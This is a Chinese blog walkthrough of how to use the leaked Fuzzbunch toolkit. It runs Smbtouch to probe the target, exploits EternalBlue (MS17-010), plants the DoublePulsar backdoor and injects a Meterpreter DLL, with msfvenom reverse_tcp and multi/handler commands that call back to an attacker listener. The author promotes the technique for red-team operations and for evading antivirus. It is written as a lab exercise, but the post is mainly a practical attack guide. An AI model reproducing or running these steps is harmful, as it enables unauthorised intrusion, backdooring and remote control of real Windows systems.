fuzzbunch工具实现dll注入

  • A+
所属分类:逆向工程

文章来源|MS08067 内网安全知识星球

本文作者:BlackCat(Ms08067 内网小组成员)


前言

上阶段无意间接触到了这个工具,感觉功能还可以,在最近的hw中,测试发现,在一些08的机器,用这个打要比msf打成功的几率要高一些,而且国内有些杀软可过。

fuzzbunch功能类似于metasploit,功能较为自动化,可以对目标机器进行漏洞探测,并查看可利用的信息,然后通过利用这个系统漏洞,如:永恒之蓝,(可以通过永恒之蓝执行并在目标机器生成一个后门文件,再通过这个后门文件远程注入dll文件 )dll文件可以用自己msf或者CS生成。

下载地址:https://github.com/peterpt/fuzzbunch.git


实验环境要求


实验目的:攻击机首先通过CS 获取93.16这台的权限,通过3389登陆到该系统,通过fuzzbunch工具,使目标机器:93.4上线 (真实环境可通过全局代理过去)

工具运行机器:Windows 7 IP:192.168.93.17(python2.6  、pywin32)
目标靶机:win7:192.168.93.4
控制端:VPS:x.x.x.x

文件解压后是这样 :

总共包含三个目录:

1. windows目录针对Windows操作系统的利用工具和相关攻击代码;

2. swift目录中是包含入侵swift银行系统的操作记录等相关证据;//不用管

3. oddjob目录是后门Rootkit等相关文档。//不用管


攻击模块介绍


打开windows目录:

fuzzbunch工具实现dll注入

主要看这个工具:

fb.py


FB模块介绍


fuzzbunch功能类似于metasploit,功能较为自动化。

fuzzbunch下载地址https://github.com/fuzzbunch/fuzzbunch。

fb.py 即fuzzbunch 框架的入口文件,fb.py用于调用各个攻击模块,这些攻击模块有较多专注于Windows 的SMB服务(详见下文)。fuzzbunch 支持自动调用 或手动配置模块,模块的使用趋于自动化,模块之间也会自动调用,用于信息探测等,模块也可以通过xml 文件的修改自行定义参数,常见的配置文件方式以xx.xml以及xx.fb文件存在。

各个模块功能详细不去赘述,用到时会逐一讲解。


1.在跳板机上 先运行install.bat自动给你安装你所需要的组件,如pywin32,然后使用Python2.6运行fb.py

运行成功会展现以下界面

fuzzbunch工具实现dll注入

填写默认配置,目标IP地址、CallbackIP、日志地址、项目名称tcc等

目标地址:靶机  192.168.93.17

Call backIP:跳板机  192.168.93.4


按照图中操作:

fuzzbunch工具实现dll注入

然后会进到FB交互页面:敲问号,操作说明

fuzzbunch工具实现dll注入

键入use命令,可以列出当前可以使用的插件,和MSF风格很类似:

fuzzbunch工具实现dll注入

插件被分解成几类:

目标识别和利用漏洞发现:Architouch,Rpctouch,Domaintouch,Smbtouch等;

漏洞利用:EternalBlue,Emeraldthread,Eclipsedwing,EternalRomance等;

目标攻击后后操作:Douplepulsar,Regread,Regwrite等。


一、Smbtouch模块探测可利用漏洞

然后我们通过使用Smbtouch使用smb协议来检测对方操作系统版本、架构、可利用的漏洞。

fuzzbunch工具实现dll注入

然后默认执行即可,前提目标机器开445端口,检测完成后 会把可利用的漏洞信息写在下面

fuzzbunch工具实现dll注入

这是执行成功后的页面显示,圈出部分为可利用的永恒系列漏洞,这里使用最经典的永恒之蓝


二、使用ETERNALBLUE生成后门文件

选择”Eternalblue”,并执行。如下图,fb会自动载入预设配置

进行相应配置,包含网络连接超时配置、目标IP、目标端口、是否验证、是否验证后门、最大exploit次数、系统选择等。如下图:

非特殊情况 保持默认(注意选择对应的系统 X64、X86),回车即可

use Eternalblue
然后保持默认 ,需要注意的是到这两个步骤是要根据实际情况去选择

fuzzbunch工具实现dll注入

模式选择:1>FB。 或者1>。进行配置,在配置完成后,会显示Eternalblue插件的配置详情。

fuzzbunch工具实现dll注入

然后成功后 会给一个配置信息页面,这时,已经成功在目标机器上植入了后门。
fuzzbunch工具实现dll注入
攻击成功

三、注入dll

使用DoublePulsar插件,DoublePulsar类似于一个注入器,有以下几个功能。

  • Ping:检测后门是否部署成功
  • RUNDLL:注入dll。
  • RunShellcode:注入shellcode
  • Uninstall:用于卸载系统上的后门

这里主要是使用rundll模板注入dll。

这里先用MSF生成dll文件,放到跳板机的目录下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.93.2 LPORT=8888 -f dll > 1.dll
然后开启监听:
msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set LhOST 192.168.93.2msf6 exploit(multi/handler) > set lport 8888msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > run
然后使用DoublePulsar插件,配置如下

fuzzbunch工具实现dll注入

然后执行,执行成功后会显示如下信息

fuzzbunch工具实现dll注入

此时观测MSF端

fuzzbunch工具实现dll注入

发现成功上线。

后言

这个实验,用了好多时间,经过多次尝试,最开始采用CS后门dll发现,执行使目标机器蓝屏重启几率较大,成功率较低。MSF的dll则不会 ,hw实战中可以作为ms17-010的攻击手段之一,亲测攻击08 效果成果较好,尤其在目标机器上存在国内杀软(如:某全家桶)可以一试,可能会有惊喜。


扫描下方二维码加入星球学习

加入后邀请你进入内部微信群,内部微信群永久有效!

fuzzbunch工具实现dll注入 fuzzbunch工具实现dll注入

fuzzbunch工具实现dll注入fuzzbunch工具实现dll注入

fuzzbunch工具实现dll注入 fuzzbunch工具实现dll注入

来和5000+位同学一起加入星球学习吧!


fuzzbunch工具实现dll注入

本文始发于微信公众号(Ms08067安全实验室):fuzzbunch工具实现dll注入

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: